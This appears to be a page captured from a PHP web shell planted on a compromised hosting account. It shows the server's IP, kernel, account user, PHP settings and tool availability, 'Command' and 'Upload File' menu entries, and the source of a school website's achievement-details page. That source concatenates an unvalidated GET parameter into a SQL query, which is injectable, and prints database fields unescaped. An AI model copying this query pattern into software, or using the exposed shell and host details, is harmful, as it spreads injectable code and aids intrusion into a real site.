Server IP : 2a02:4780:3:1378:0:3736:a38e:10 / Your IP : 3.145.106.222 Web Server : LiteSpeed System : Linux sg-nme-web1278.main-hosting.eu 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : u926327694 ( 926327694) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u926327694/domains/smvpuc.org/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php if(isset($_GET['id'])) { $id = $_GET['id']; include('header.php'); $news_letter_class = "newsletter-area-2"; ?> <section class="page-banner"> <div class="page-banner-bg bg_cover" > <div class="container"> <h2 class="about-title custom_title"><span>Achievement Details</span></h2> </div> </div> </section> <section class="mb-50"> <div class="container"> <?php $query_mng = mysqli_query($con,"select * from achievers where id=$id"); while($res_mng = mysqli_fetch_array($query_mng)) { ?> <div class="row teachers-row justify-content-center"> <div class="col-lg-12 teachers-col"> <div class="teacher-details-content mt-45"> <h4 class="teacher-name"><?php echo $res_mng['event']; ?></h4> <ul class="teacher-contact"> <li><strong>Name:</strong> <a href="#"><?php echo $res_mng['name']; ?></a></li> <li><strong>Year:</strong> <a href="#"><?php echo $res_mng['year']; ?></a></li> <li><strong>place:</strong> <a href="#"><?php echo $res_mng['place']; ?></a></li> </ul> <p><?php echo $res_mng['remarks']; ?></p> </div> </div> </div> <?php } ?> </div> </section> <?php include('footer.php'); ?> <?php } else { echo"<script>window.location='achievement.php';</script>"; } ?>